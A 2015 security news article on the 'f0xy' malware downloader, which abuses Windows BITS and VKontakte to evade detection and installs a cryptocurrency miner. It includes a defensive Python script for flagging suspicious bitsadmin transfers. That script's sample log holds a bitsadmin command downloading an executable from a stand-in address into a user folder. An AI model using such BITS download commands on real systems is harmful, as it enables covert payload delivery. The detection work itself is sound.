Threat relies on legitimate services for its nefarious tasks

Jan 30, 2015 16:18 GMT  ·  By

Cybercriminals have developed a new tool to help them deliver malware to the victim’s computer in a surreptitious manner by abusing legitimate functionality in Windows and constantly improving the code.

The freshly discovered malware downloader has been dubbed “f0xy” by researchers at Websense, who took a look at its capabilities.

Minting digital coins is the end game

According to their analysis, the authors of the threat are continually working on it in order to reach a version that is compatible with more operating systems and can go undetected for longer periods of time.

They found that f0xy relies on a dynamic list of command and control (C&C) servers in order to funnel in malicious files. Another strategy adopted by the authors to evade detection is using Microsoft's Background Intelligent Transfer Service to download the data.

Some of the samples identified by Websense dated from January 2015 and they could run only on Windows Vista and above. Newer versions have been developed, though, including support for Windows XP.

The malware downloaded by f0xy does not steal sensitive information such as passwords or financial details; instead, its operators appear to use it to make money quite literally: Websense noticed that it installs a crypto-currency miner on the affected system.

Several evasion tactics are used

According to the security researchers' analysis, code and string obfuscation techniques are scarcely applied, in order to make the file look legitimate and thus hide in plain sight.

Also helping it fly under the radar is the fact that it contacts the Russian social networking website VKontakte to retrieve the list of C&C servers. Connections to this host appear legitimate to malware detection tools, so no suspicion is raised.

The same goes for the Background Intelligent Transfer Service (BITS, driven from the command line through bitsadmin.exe) in Windows, which is commonly employed to deliver operating system updates without impacting the available bandwidth.

“Presumably the main reason for using BITS is to prevent security products from flagging its behavior as suspicious, because anti-malware solutions are much less likely to have a problem with bitsadmin.exe performing network requests than an unknown executable,” Websense says.
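The detection gap Websense describes is that bitsadmin.exe is trusted as a process, so the useful signal is not the executable but what it is asked to transfer. The following is an added example, not code from Websense or from the f0xy analysis: it parses constructed process-creation log lines, pulls the remote URL and local destination out of each `bitsadmin /transfer` command line, and flags transfers whose source host is outside an assumed allowlist of update hosts, whose destination is an executable, or whose destination sits in a user-writable directory. The log format, the allowlist, the IP address and the file paths are all illustrative assumptions.

```python
"""Flag suspicious bitsadmin.exe transfers in process-creation logs.

Added example (not part of the Websense analysis). The log lines, the
trusted-host allowlist, and the paths below are constructed for illustration.
"""
import re
import shlex
from urllib.parse import urlparse

# Constructed sample events: "<time> parent=<proc> image=<proc> cmd=<command line>"
SAMPLE_LOG = """\
2015-01-28T10:01:02Z parent=svchost.exe image=bitsadmin.exe cmd=bitsadmin /transfer wuJob /download /priority normal http://download.windowsupdate.com/msdownload/update/x.cab C:\\Windows\\Temp\\x.cab
2015-01-28T10:05:44Z parent=unknown.exe image=bitsadmin.exe cmd=bitsadmin /transfer j1 /download /priority foreground http://203.0.113.9/get/miner.exe C:\\Users\\bob\\AppData\\Local\\Temp\\svc.exe
2015-01-28T10:06:10Z parent=explorer.exe image=notepad.exe cmd=notepad.exe C:\\Users\\bob\\notes.txt
"""

# Assumed allowlist of hosts from which BITS downloads are expected (illustrative).
TRUSTED_HOST_SUFFIXES = ("windowsupdate.com", "microsoft.com")
EXECUTABLE_EXTENSIONS = (".exe", ".dll", ".scr", ".bat", ".ps1")
USER_WRITABLE_MARKERS = ("\\users\\", "\\programdata\\")

EVENT_RE = re.compile(
    r"^(?P<time>\S+) parent=(?P<parent>\S+) image=(?P<image>\S+) cmd=(?P<cmd>.*)$"
)


def parse_event(line):
    """Split one constructed log line into its fields, or return None."""
    m = EVENT_RE.match(line.strip())
    return m.groupdict() if m else None


def parse_transfer(cmd):
    """Return (url, dest) from a 'bitsadmin /transfer ...' command line, or None."""
    tokens = shlex.split(cmd, posix=False)  # posix=False keeps Windows backslashes intact
    if "/transfer" not in [t.lower() for t in tokens]:
        return None
    for i, tok in enumerate(tokens):
        # The remote URL is followed by the local destination path.
        if tok.lower().startswith(("http://", "https://")) and i + 1 < len(tokens):
            return tok, tokens[i + 1]
    return None


def host_is_trusted(host):
    """True if the host is one of the allowlisted suffixes or a subdomain of one."""
    host = (host or "").lower()
    return any(host == s or host.endswith("." + s) for s in TRUSTED_HOST_SUFFIXES)


def suspicion_reasons(url, dest):
    """Collect the reasons a transfer deserves analyst attention."""
    reasons = []
    host = urlparse(url).hostname
    if not host_is_trusted(host):
        reasons.append(f"untrusted host {host}")
    low = dest.lower()
    if low.endswith(EXECUTABLE_EXTENSIONS):
        reasons.append("executable destination")
    if any(marker in low for marker in USER_WRITABLE_MARKERS):
        reasons.append("user-writable destination")
    return reasons


def scan(log_text):
    """Return a finding for every bitsadmin transfer with at least one reason."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if not ev or ev["image"].lower() != "bitsadmin.exe":
            continue
        parsed = parse_transfer(ev["cmd"])
        if parsed is None:
            continue
        url, dest = parsed
        reasons = suspicion_reasons(url, dest)
        if reasons:
            findings.append({"time": ev["time"], "parent": ev["parent"],
                             "url": url, "dest": dest, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["parent"], f["url"], "->", f["dest"], "|", "; ".join(f["reasons"]))
```

Run as-is, the script reports only the second event: the update download from an allowlisted host to a system temp directory passes, while the transfer of an .exe from an unlisted address into a user profile is flagged on all three counts. In a real deployment the allowlist and the parent-process field (svchost.exe versus an unknown binary) would be tuned to the environment's own update infrastructure.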

Unless stopped, f0xy transfers and runs CPUMiner on the compromised computer and uses the tool with CoinMine.pw, a script for mining different types of digital money. It also allows multiple systems to be assigned to “minting” the digital coins.

At the time of the analysis, only five of the 57 antivirus engines available at VirusTotal were able to detect the threat. However, subsequent scans three days ago showed improved detection, with 10 products identifying the malicious piece.

The security researchers expect malware authors to focus more of their attention on the use of legitimate services in order to hide their malicious operations.

Image gallery (2 images): f0xy uses multiple strategies to fly under the radar; Researchers find a base64 encoded string.